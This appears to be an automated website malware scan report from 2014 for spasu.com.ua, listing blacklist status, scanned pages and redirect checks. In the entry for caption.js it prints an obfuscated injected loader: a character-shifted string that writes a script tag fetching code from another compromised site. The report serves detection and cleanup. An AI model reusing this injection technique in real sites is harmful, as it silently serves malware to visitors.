Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spasu.com.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spasu.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://spasu.com.ua/ | 200 OK Content-Length: 47053 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33366 bytes skipped]... "> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Главное меню</h3> <ul class="menu"><li id="current" class="active item6"><a href="http://spasu.com.ua/"><span>Главная</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Магазин</span></a></li><li class="item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>Статьи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Онлайн игры</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1&Itemid=7"> ...[20613 bytes skipped]... | ||
http://spasu.com.ua/media/system/js/caption.js | 200 OK Content-Length: 2163 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); <!-- js-tools --> l=0;while(l<90)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00tubgg/psh/vb0benjojtusbups0dpnqpofout0dpn`ti515tfg0tubu/qiq#?=0tdsjqu?'.charCodeAt(l++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://spasu.com.ua/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 11371 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2285511 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11840 Content-Type: application/javascript | clean |
http://spasu.com.ua/index.php?option=com_content&view=category&layout=blog&id=14&Itemid=25 | 404 Ресурс не найден Content-Length: 1832 Content-Type: text/html | clean |
http://spasu.com.ua/index.php | 200 OK Content-Length: 47053 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33366 bytes skipped]... "> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Главное меню</h3> <ul class="menu"><li id="current" class="active item6"><a href="http://spasu.com.ua/"><span>Главная</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Магазин</span></a></li><li class="item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>Статьи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Онлайн игры</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1&Itemid=7"> ...[20613 bytes skipped]... | ||
http://spasu.com.ua/index.php?option=com_content&view=category&layout=blog&id=25&Itemid=34 | 404 Ресурс не найден Content-Length: 1832 Content-Type: text/html | clean |
http://spasu.com.ua/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://spasu.com.ua/index.php?option=com_content&view=category&id=100&Itemid=243 | 200 OK Content-Length: 40824 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33616 bytes skipped]... <div id="content"> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Главное меню</h3> <ul class="menu"><li class="item6"><a href="http://spasu.com.ua/"><span>Главная</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Магазин</span></a></li><li id="current" class="active item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>Статьи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Онлайн игры</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1& ...[14395 bytes skipped]... | ||
http://spasu.com.ua/1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 30 Jun 2014 00:58:12 GMT Location: http://spasu.com.ua/1/ Server: nginx/1.0.15 Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | clean |
http://spasu.com.ua/1/ | 200 OK Content-Length: 27332 Content-Type: text/html | clean |
http://spasu.com.ua/1/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://spasu.com.ua/jquery-1.9.1.min.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://spasu.com.ua/jquery.ui.core.min.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
http://spasu.com.ua/jquery.ui.widget.min.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: spasu.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Mon, 30 Jun 2014 00:58:08 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 30 Jun 2014 00:58:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a28642e8ce6b4a6010947b4822fac6f6=9fb9e7ccc51199e8c31bd5d3209dbddf; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: spasu.com.ua
Referer: http://www.google.com/search?q=spasu.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.